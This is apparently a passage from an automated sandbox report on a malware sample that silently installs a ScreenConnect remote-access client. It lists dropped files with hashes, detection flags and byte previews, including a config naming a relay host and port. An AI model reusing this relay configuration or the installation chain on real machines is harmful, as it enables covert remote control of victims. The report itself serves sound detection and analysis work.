                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):61208
                                                                                                                                                                    Entropy (8bit):6.310126082367387
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                                                                                    MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                                                                                    SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                                                                                    SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                                                                                    SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):266
                                                                                                                                                                    Entropy (8bit):4.842791478883622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):602392
                                                                                                                                                                    Entropy (8bit):6.176232491934078
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                                                                                    MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                                                    SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                                                                                    SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                                                                                    SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):266
                                                                                                                                                                    Entropy (8bit):4.842791478883622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):842248
                                                                                                                                                                    Entropy (8bit):6.268561504485627
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                                                                                                    MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                                                                                                    SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                                                                                                    SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                                                                                                    SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):81688
                                                                                                                                                                    Entropy (8bit):5.8618809599146005
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                                                                                                    MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                                                                                                    SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                                                                                                    SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                                                                                                    SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe.config

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):266
                                                                                                                                                                    Entropy (8bit):4.842791478883622
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                    MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                    SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                    SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                    SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                    C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\system.config

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with very long lines (463), with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):953
                                                                                                                                                                    Entropy (8bit):5.76285111936072
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:2dL9hK6E4dl/kGuanOt+qPySnLb5pUgzWvH:chh7HHiqo1nLHHWv
                                                                                                                                                                    MD5:D4A9F5EA2DA4BBD0CB33743E9BC848CE
                                                                                                                                                                    SHA1:BBEA3254495249FA96D667391BA4E90F92CBACD5
                                                                                                                                                                    SHA-256:644282531083B8CDE902CDBDB71BDC55C3AAE9225072465B66640C16A5923F27
                                                                                                                                                                    SHA-512:00186C860DAF6690F5A5D0E2B90DC76A049759562C52407BC51662F775FDE6DFFEFD036ACC4C8ADC9955E0D8F39897E6E11BDDBCF0003FE279B6D9DE31C63EC6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=sc.connectprotocol.es&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                    Entropy (8bit):0.363788168458258
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                                                                                                    MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                                                                                                    SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                                                                                                    SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                                                                                                    SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):1.310789453584447
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr+:KooCEYhgYEL0In
                                                                                                                                                                    MD5:90C43E9899FCDDBF2B005A27FA8F28E0
                                                                                                                                                                    SHA1:BEDCBBDBB4A72ED8507FDA47A7DD73F393C44E1D
                                                                                                                                                                    SHA-256:B89C573FB467C56C098C5E5E1B8DF184377C36951BC3CAD19B51F8D857E94410
                                                                                                                                                                    SHA-512:9965F58802E61069FFA1D992163455288A2D0E97998A62E6DD1BF897DC400734307EF2DFA66E51E11DDDC6EFDD2537404A54907DE0937C11C5D6402610D57C7D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8fb87c02, page size 16384, Windows version 10.0
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):0.42222520857188045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:fSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:fazag03A2UrzJDO
                                                                                                                                                                    MD5:4D5D801446B9BE54D26D2BC42A6BF8FD
                                                                                                                                                                    SHA1:51EB417D0051FC112A89170C3DCDA6B4D700942F
                                                                                                                                                                    SHA-256:CE7D3EF5371F6BB1EA1DD091A98BF7E4C69EB9364CA9A2214BDCB1D9101BD251
                                                                                                                                                                    SHA-512:DBA3201DBE6F34FF4F05D9F78F65D754ADA03AC615FB411FE1307E97D8A766E8C7C276C62A04244EE89D7E4366216A8D5F391DA5243B6C59D993B8F3F54D3239
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..|.... .......Y.......X\...;...{......................n.%...../....|.."....|..h.#...../....|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................L../....|....................../....|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                    Entropy (8bit):0.07922768234169193
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ALUetYew43wn6rtUeWr6rElrWrtSurtillOE/tlnl+/rTc:Ahz93w6uOirWIu0pMP
                                                                                                                                                                    MD5:DE8BDFF35E35EEA6A3C29345B14B7142
                                                                                                                                                                    SHA1:537FE2D72F3C379552C473C37B0C181C963D3A28
                                                                                                                                                                    SHA-256:3C8A1AAD13461014A830C27AA8C71CF70804FF9D8E9B016C5F32F91AA1FEDC3C
                                                                                                                                                                    SHA-512:F71B071086862919CACF6D9B1EE6DDE95AD480294313D2205232F8C8579CED4A9C32331D8E237BF12662B63F538BAD6C79715A09D367F466C4F6EE6BA4DA415E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.<.T.....................................;...{.."....|../....|........../....|../....|...]ee/....|....................../....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f53WqfzzNt.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\f53WqfzzNt.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):321
                                                                                                                                                                    Entropy (8bit):5.36509199858051
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                                                                                                    MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                                                                                                    SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                                                                                                    SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                                                                                                    SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):746
                                                                                                                                                                    Entropy (8bit):5.349174276064173
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                                                                                                    MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                                                                                                    SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                                                                                                    SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                                                                                                    SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1088392
                                                                                                                                                                    Entropy (8bit):7.789940577622617
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
                                                                                                                                                                    MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                                                                                                                                                    SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                                                                                                                                                    SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                                                                                                                                                    SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\CustomAction.config

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):234
                                                                                                                                                                    Entropy (8bit):4.977464602412109
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                                                                                                    MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                                                                                                    SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                                                                                                    SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                                                                                                    SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.Cab.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                    Entropy (8bit):4.62694170304723
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                                                                                                    MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                                                                                                    SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                                                                                                    SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                                                                                                    SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.dll

                                                                                                                                                                    Download File
